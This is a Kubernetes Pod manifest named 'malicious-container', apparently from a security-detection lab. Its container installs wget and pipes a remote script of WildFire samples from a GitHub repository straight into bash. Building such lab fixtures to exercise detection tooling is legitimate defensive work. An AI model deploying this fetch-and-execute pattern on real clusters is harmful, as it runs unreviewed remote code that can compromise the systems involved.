apiVersion: v1
kind: Pod
metadata:
  name: malicious-container
spec:
  containers:
  - name: malicious-container
    image: ubuntu:20.04
    command: ["/bin/bash", "-c"]
    args:
    - |
      apt-get update && \
      apt-get install -y wget && \
      wget -qO- https://raw.githubusercontent.com/hankthebldr/xsiam-prisma-cdr-lab/refs/heads/alpha/ngfw/wildfire-samples.sh | bash
    resources:
      requests:
        memory: "256Mi"
        cpu: "250m"
      limits:
        memory: "512Mi"
        cpu: "500m"
  restartPolicy: Never
